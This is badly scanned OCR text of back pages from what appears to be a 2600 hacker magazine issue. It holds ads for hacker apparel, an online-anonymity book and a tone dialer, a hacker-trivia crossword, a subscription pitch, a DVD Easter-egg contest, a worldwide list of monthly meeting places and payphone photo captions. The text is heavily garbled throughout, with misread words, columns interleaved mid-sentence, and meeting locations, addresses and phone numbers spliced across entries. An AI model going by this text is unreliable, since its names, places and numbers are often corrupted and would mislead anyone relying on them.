HACKER T-SHIRTS AND STICKERS at JinxGear.com. Stop running around naked! HOW TO 8E ANONYMOUS ON THE INTfRNkl. fa%$to fn low trson5 an arhwnng
We've got new rwagalinaus t-rh~rts, stickers. and miscellaneous contraband com- Internetanonymity, privacy, and security. The book's 20 chapters cover 1) simple
ing out monthly including your classic hacker/geek designs, hat-short panties, dog proxy use for WW: 2) how to rend and receive e-mail anonymously: 3) use SOCKS
shirts. and a whole mess of kickarr stickers. We also have LAN oartv lirhnar. prones for IRC, ICQ. NNTP, SMTP, HTTP: 4) web based proxies - JAP. Multiproxy.
n a c w con'errr~pI!5nngs. mellaqe~orbmr,a pnato cat er), an0 m0n.n y con- Crowds: 5) do-it-yourself proxies - AnalogX, Wingater; 6) read and post ~n "em-
.
terrr. he1 oonr ern biy. 125: r gn or tne ma) 8ng Irr an0 have a m a w e ra win O~OUDI (Usenet) i n complete privacy: 7) for eav proxies. Learn how to hunt for.
five t r ,If_ 01 101 OY. tne easy ~nlt.,rno-I 10 get a frer sucrer. Grr 11n l at flno. an0 .rl 1zea.l ryper of proxler, clean up y0.r baurers. clean .p yo., m o l e

1
wwwJinx.cam! Nbnoo~rOS This proferriona'.y m n c n 0.t non.tecnnlca.~arqor~f l lea book Ir
PHONE HOME. Tiny, sub-miniature. 7/10 ounce, programmable/reprogrammable geared towards the beginner to advanced readerr and the average Internet user.
touct-tone multi-freo~nl* , , .IDTMn, dialer which can store uo to I 5 touch-tme The book lessons are on a CD i n easv to read HTMLinterface format with numerous
o\qtrc .n#+ Ir ne o aqamr the teleonare rerelver s mlrwphone for olalmg Prerr illustrations throughout. Send $20 (I'll pay S/H) to Plamen Petkov. 1390 E Vegas
nOUE to a~toma!#cay dla rne :tore3 Oigit~ani+ can :"en ne hear0 :nro .qn Valley Dr. #40. tar Vegas. NV 89109. Money orders, personal checks, cash accepted.
Across

1.Hackersauniv.
3.Legion of -
6.Usenet starter
9,Dir for Unix
10. Bad on a boarding pass
13.CPU, ROM, eg.
14.Independent fortress
phone
18.2.4Ghz transmission
19.Multics successor
21.Early net.
24.Telco wire inits.
25. GUI predecessor
26.2600 build
28. Popular distribution
31. Some hackers break
these
33. White House zone (abbr.)
34. Otwell's farm
35. Meeting space Down 27. MOD'Smark?
36. Framer of the manifesto 29. Pen reg.
39. Old Baby Bell 1. 100010101100 30. Early scene zine
41. Net hell? 2. Social engineering must 32. WWll Ohio shortwave
42.Stood up to the MPAA 3. Back-up media (abbr.) sta.
44. What 2600 repainted 4. Platform (abbr.) 36. Chinese TLD
47. Cow plus yak 5. Degree of achievement 37. What pine is not
48.ALGOL - Latin similarii for some hackers 38. Phrack founder
49. Once 10562 7. Common - 40. String oriented symbolic
50. Do not overtlow this 8. Class 4 CO language
52.The stage for Hackers 11. Quarterly hundreds digit 41. Military secondary
53.Cult's Blood 12. Open source guru 43. Marching orders?
54. Conference Keynoter 15. Bandwidth meas. (abbr.)
55. Cx Cc 16. Flash 44. Oy
17. Off The Hook theme 45. Future armies (acro.)
20. 212, 718 e.g. 46. Old Macintosh
22. P2P enemy 47. 2200+1700*2
23. Much of spam 48. 3110 to Telenet (abbr.)
51. Suffix deserving death?
l ~ o u l dyou prefer it if people didn't see you
lbuying it at the bookstore and follow you
after you leave the stog? \g &>
There's a soluki 84%
II o f It's called t h e 2600 Subscription and it can be yours in a couple
ways. Either send $20 for one year. $37 for two years. o r $52
I for three years (outside t h e U.S. and Canada. that's $30, $54, and
1675 respectively) t o 2600, PO Box 752, Middle Island. NY 11953
I USA or subscribe directly from us online using your credit card a t
I Theoretically you would never have t o leave your house again.

- P
-
many people ask us just how, These are the rules.11 entnes must
many Easter Eggs there are i n the Freedom Downtime DVDs t h a t / /
we've decided t o make a contest out of it. I f vou find the/\ber 1, 2005 and t h e winner ill b e /
highest number of Easter Eggs i n this double DVD iet, you'll win I/
announced i n the Fall 2005 issue.
What constitutes an Easter EaaI
the following: 1 / t h i n g on the DVDs that is deliberG:ly hi;-
/ den i n some way so t h a t you get a Little
I / thrill when you discover it. When you find
n l i f e t i m e subscription t o 2600
1
one of these, we expect y o u t o t e l l us how
you found it and what others must do t o
ALL back issues see it. Simply dumping t h e data on the DVD 1
\One item o f every piece of clothing we sell 11 is not sufficient. 1
j 1 It's possible that there are some Easter
f"IAn O f f The Hook DVD with more possible Easte r Eggs Eggs that don't require you to hit buttons
rl~nother Freedom Downtime DVD since you wr i l l have i but that contain a hidden message1
nonetheless. For Instance, i f you dlscover
probably worn out your old one that tahng the first l e t t e r of every word'
TWO tickets t o the next HOPE conference
.-
that Kevin Mitnick says i n the f l ~ mspells
out a secret rnessaoe bv aLL means ~nclude
- - < ,

1
Submit entries to: that. We will be judging entnes on thor-'
oughness and there is no penalty for see-
Easter Egg Hunt c/o 2600, PO Box 752, Middle Island, NY 11953 USA ing an ~~~t~~ E~~ that isn't there. you can
You can get t h e Freedom Downtime double DVD set by sending $30 t o enter as many times as You wish. Your best
score i s the one that will count. Remember,
t h e above address or through our Internet store located a t
there is no second place! So plan on
\ store.26OO.com. spending the next few months

Page 63 1
M@ElWNA FRANCE Florida North Carollna
R. l a u d d a l e : Broward HBU in the food
Buenos Ai*: In the bar at Sandgp(K.
AUSTRALIA
Awgnon: Bottom of Rue de la Republique
court 8 pm. -.-ha%-
Charlotte: South Park Mall food court.

I
in front ofthe fountain with the flowers. 7 pm.
Adelaide. At the payphoner near the 7 pm. neruillr: in the o i the &r:tiy fmtnsborNBIBFRock Cafe, !&dLv
AcaSemv Clnenia on Pullenev St 8 pm. , Gremlble: Eve, c a w of St. lorlda'i Reltl Uni<>nfood court 6 pm Shopping rcilte, 6 pm.
Brirbane: Hunsry Jacks on the aueen S t d'Hrre; ando: Farhlon Square Mall Food Court Raleigh: l p k Cafe And Intrlnet Garnlng
-*
Mall (RHS, opporitelnfo Booth! 7 pm Pans: Place de la Repi~bllque. ween Hovan (,ourmet and Miinthii Wok Ceotir. Royal rill 3801 Hilkbarough5: b pm.
Canberra: KC'S VirtualReabty Cafe. 11East (emot\il $(ountain.6 pm. 6 pm. Wilmington: Indepeodenr~Mall food
RW. Civic. 7 pm. Rennes: I n front of the store 3 l u e Box" Tampa: University Mall in t h e back of the court.
Melbourne: Caffeineat Rwault bar. 16 close t o the place of the Repubbc. 7 Pm. food court on the 2nd floor. 6 pm. North Dakota
Swaniton Walk. 6 pm. GREECE Georgia 'Far&-: West Aoei Mall food court by the
Perth: The Merchantlea and CoffeeHo~3e. Athenr: Outsidethe bookstore Atlanb: Lenox Mall food court. 7 pm. Taco 3ohn'r.
183 Murray St. 6 pm. Pa~arwtiriouan the corner of Patirion and Idaho Ohio
Svdnev:
. . The Crvrtal . Palace, front Stourman'. 7 pm. Boise: BSU Student Union Building, up- Akron: Aiabica on W Market Street.
barjbirtro, opposite the bur station area IRELAND stairs from the main entrance. Payphaner: interrertian of Hawkinr. W. Market, and
an George Street at Central Station. 6 pm. Dublin: Atthe phone booths on Wicklow (208) 342-9700.9701. Exchanqe.
AUSTRIA Street besideTower R~mfds.7 Pm. Pocatello: College Market, 604 South 8th Cleveland: Uniwrrity Circle Arabica.
Gnz: Cafe Haltertelle on Jakominipla+z. ~ L Y Street. 11300 Juniper Rd. Upstairs. turn right, sec-
BRAnL Milan: Piazza Loreto in hont of McDonalds. Illlnois ond room on left.
Belo Horizonte: Pelego's Bar at Assufeng. JAPAN Chicago: Union Station i n the Great Hall Dayton: At the Marions behind the Dayton
near the payphone. 6 pm. Toltyo: Linux Cafe in Ahhabara district. near the payphanes, 5;30 pm. Mall.
CANADA 6 pm. Indiana Oklahoma
AlbCIta NEW ZElLAND Evansville: Barnes and Noble cafe at 624 S Oklahoma City: Cafe Bella. southeast
Calgary: Eau Claire Market b o d cwrt by lucklsnd: London Bar, u ~ r t a i n .Wellesley G~~~~ ~i~~~ ~d. corner of SW 89th Street and Penn.
the bland yetow wall. 6 pm. St., Auckhnd CentraL 5:30 pm. Ft. Wayne: Glenbrook Mall food court in Tulsa: Java Dave's Coffee Shop on 81rt and
British Columbia Christchurch: Java Cafe, corner of High
Nanaimo: Tim Horton'r at Camox 8 Wal- front of Sbarrosr. pm, Harvard.
St. and Mancherterst. 6 pm. Indianapolis: Corner Coffee, SW corner of Oregon
lace. 7 pm. Wellington: Load Cafe in Cuba Mall. 6 pm.
Victoria: W Bakery and Cafe. and Alabama, Portland: Backspace Cafe. 115 NW 5th Ave.
NORWAY South Bend (Mishawaka): Barnsand 6pm.
1701 Government St. Oslo: Oslo SentralTrain Station. 7 pm. Noble 4601 GrapeRd,
Manitoba Pennsylvania
Tromrse: The upper floor at Blaa Rock Iom Alttntown: Paocra Bread. 3100 West
Winnipeg: St. Vital Shopping Centre. food Cafe. 6 pm.
court by HMV. Amer: Santa Fe Erprerro. 116 Welch Ave. Tilghman Street. 6 pm.
Trondheim: Rich Cak in Nardregate. 6 pm. Kansas Philadelphia: 30th Street Ration, under
New Brunswick
SCOTLAND Kansas City (Overland Park): Oak Park Stalrwell7 agn.
Moncton: Ground Zero Networks Internet
Gbsgov: Central Station, payphoner next Mall food court. Fittsburgh: William Fitt Union building an
Cafe, 720 Main St. 7 pm.
to Platform 1. 7 pm.
Ontalio Wichita: Riverside Perk, 1144 Bitting Ave. the University of Rteburgh campus by the
SLOVAKIA
Barri~ William's Coffee Pub. 335 Bryne Louisiana Bigelow Boulevard entrance.
Presov City: Kelt Pub. 6 pm.
Drive. 7 pm. Baton Rouge: In the LSU Union Building, South Caroltna
SOUTH AFRICA
Guelph: William'r Coffee Pub. between the Tiger Pause 8 McDonald's, Charleston: Northwoods Mallln the hall
(Sandton City): Sandton
492 Edinbourgh Road South. 7 pm. next to the payphoner. between Sean and Chik-Fil-A.
food court 6 3 0 pm.
Hamilton: McMarter University Student New Orleans: La Fee Verte. 620 Conti South Dakota
SWEDEN
Center. Roam 318.7:30 pm. Street' pm. Sioux F a \ k Emp~reMall, by Bu~gerKing.
Gothenburg: Outstde Vanilj. 6 pm.
Ottawa: World Exchange Plaza, 111 Albert Elaine Tennessee
Stockholm: Outside Lava.
St., second Raor. 630 pm. Portland: Maine Mall by the bench at the Knoxville: Borderr Bookr Cafe across from
SWITZERLAND
Toronto: Future Bakery. 483 Bloor St. Wen court door' Weltown Mall.
lausanne: I n front of the Mac00 beslde
Windror: Univerrity Student Center by the Ua$anlns Memphis (Cordova): San Francisco Bread
the tram station.
large window. 7 pm. Baltimore: Barnes 8 Noble cafe at the Company. 990 N. Germantown Parkway.
UNITED STATES
Quebec Inner Harbor. 6 pm.
Alabama
Montreal: Bell Amphitheatre, Massachusetts Nashville: 3-J's Market. 1912 Broadway.
Auburn: The student lounge uprtairr i n
I000 GauchetiereStreet. Boston: PrudenbalCenter Plaza, tenace Texas
the Foy Union Bu~lding.7 pm.
CHINA food court at the tables near the windows. Austin: oobie Mall food court. 6 pm.
Huntrville: square the
-
Hans Kong: - Pacific Coffeein festival
food court near McDonaldp.
Marlborough: Solomon Park Mall food Dallas: Mama's Pizza. Campbell 8 Preston.
Walk. Kowlwn Tong. 7 pm. 7 pm.

i
Tuscaloosa: ~ r h r l a n dM~II food court
UECH REPUBUC Northamptan: Javanet Cafe across from Houston: Ninfa'r Express in front of
Prague Legenda pub. 6 pm. near the front entrance.
Arizona Polaski Park. Nordrtrom'r i n the Galleria MalL
DENMARK Michigan San Antonio: North Star Mall food court.
Aalborg: Fan Eddy'r pool halL Phoenix: Borders. 2nd Floor Cafe Area.
2402 E. Camelback Road. Ann Arbor: The Galleria on South Utah
Aathur: In the far corner of the DSB cafe Uniwrsity. Salt Lake City: ZCMI Mallin The Park Food
in the railway station. Tucson: Borders i n the Park Mall. 7 pm.
Copenhagen: Ved Cafe Blaren. California Minnesota Court.
L~~ Angeler: Union Stahon, cornerf,, Bbomington: Mall of America, north ride Vermont
Sonderborg: Cafe Druen. 230 pm.
Alameda, Indde main entrance by food court, across from Burger King & the Burlington: Borders Books at Church St.
E m Macy
Port L i d : At the foot of the Obelisk bank of phones. Pqyphoner: (213) 972-9519, bank lrf payphonesthat don't take and Cherry St. on the second floor ofthe

(El Missallah).
ENGUND
Brighton: At the phone boxer by the Seal-
9520: 625-9923.9924: 613-9704. 9746.
Manterey: Morgan's Coffee & Tea. 498
Washington St.
"imingca'k'
Missouri
Kansas City (Independence): Barnes 8
cafe.
Virginia
Arlington: (nee Oirtrict of Columbia)
I
Orange Couno/ (lake Forest): ~iedrich Noble. *91M East 39th St Virginia Beach: Lynnhaven Mall on
ife Centre (scrarr the road from the Palace
~ St. t Louis (Maryland Heights): Rivah Lynnhaven Parkway. 6 pm.
Fier). 7 pm. Payphone: (01273) 606614.
Fxetcr: At the payphoner. Bedford Square.
7 pm.
coffee, 22621

Sunnre and Madaon.


~ oD",,~. ~ 8pm.
Sacramento: camille'r at the corner d
~
Technology Cafe. 11502 6 pm.
Springfield: Borders Booksand Music rof-
Washington
Seattle: Washington State Convention
1
Hampshire: Outride the Guildhall sari biego: R~~~~~~ ~ i 4150~ uegentr ~ , feeshop. 3300 South Glenstone Ave, one Center 6 pm.
Portsmouth. Park Row #170. block south of Battlefield Mall. 5:30 Dm. Wisconsin I
Hull: The Old Gray Mare Pub, opposite Hull San Francisco: 4 Embarcadero PLaza (in- Nebraska Madison: Union South (227 Y. Randall
University. 7 pm. ride). payphone$:(415) 398-9803.9804, Omaha: Crnrrroadr Mall Food Court. 7 pm. Ave.) on the lower level in the Copper
London: Troedero Shopping Center (near 9805.9806. Nevada Hearth Lounge.
Picadilly Circus). lowest level. 6 3 0 pm. San Jose: Outride the cafe at the MLK ~i. h s VLgsr Palms (asino food court. 8 pm. MIIwaukee: The Node. 1504 E. North Ave.
Manchcrter: The Green Room on Whit- brary at 4th and E. San Fernando. 6 pm. Nm Mexico
worth Street 7 pm. Santa Barbara: cafe Mena on State street. Albuquerque: Winrock Mall food coort, All meetings take place on the first Friday
Nowich: Main foyer of the Norwich Colorado near payphones on the lower level between of the month. Unlerr otherwire noted, they
"Forum" Library 5:30 pm. Boulder: Wing Zone food court, 13th and the fountain 8 arcade. Payphone: ($05) start at 5 pm local time.
Reading: Aho Bar, Merchants mce, off Collqe. 6 pm. 883-9985.9976.9841.
Friar St. 6 pm. Denver: Borders Cafe, Parker and Arapahoe. New York To rtarta meeting in your city, leave a mes-
FINLAND District of Columbia New Yo* Citigroup Center, in the lobby, rage 8 phone number at (631) 751-2600 or
Hcln'nU: Fenniakoltteli food court Arlington: Pentagon City Mall in the food near the payphoner. 153 E 53rd St.. rend emarl to meetings@Z600.com.
(Vuo"btu 14). court. 6 pm. between Lexington 8 3rd.
I
Pay~honesof the world^

Sarnarkand, Uzbekistan. Coins o i ~ l yh u t w h a t


' Mumbai, India. A co111c r i j ~ ~ a i epi lil o n t . dt the
a i n l a g n i f i c e n t h a n d s e t . A i i d j ~ i i iLoolc h o w " Taj Malial H o i < ~ l .
t h e y ' v e r e c o n f ~ g u r e dt h e t o u c h tot-I? p a t i !

Anuradhapura, Sri Lanka. W e ' v ~ i e ~ r it h e Firenze, Italy. A 511 1 1 t3 d q e p h o n e t h a ~~ u o l . .


d c t u a l p h o n e ~n a p r e v l o u s issue b u t t h ~ s as fit's ah0111 t o l ~ i l i , l w l t h ~ n t h ~ ~ s r a s r n
r u ~ a Lp h o n e b o o t h IS a s t r ~ k ~ i sl y~ y h t

Photo by Toin Mele Photo by L o r e t t e Mas

is page can now be found CM


This has to be about the worst idea ever concocted. We've heard of
driverless light rail systems in the confines of an airport but huge
steel freight train locomotives on an easily accessible track?
Technology marches on.
Found in Roseville, CA.
Photo by Adrian Lamo

Ireau of Citizenship and lmmigratlon Alien's Change of I


-
AME (Last in CAPS) (First) (Middle) lAMl
l#W . ..-,ident
-lher ....,... (Speclb
DUNTRY OF W- - L V m~NUMBER FROM ALIEN CARD
ITlZENSHlP
2-
(State) (ZIP Code

You might also like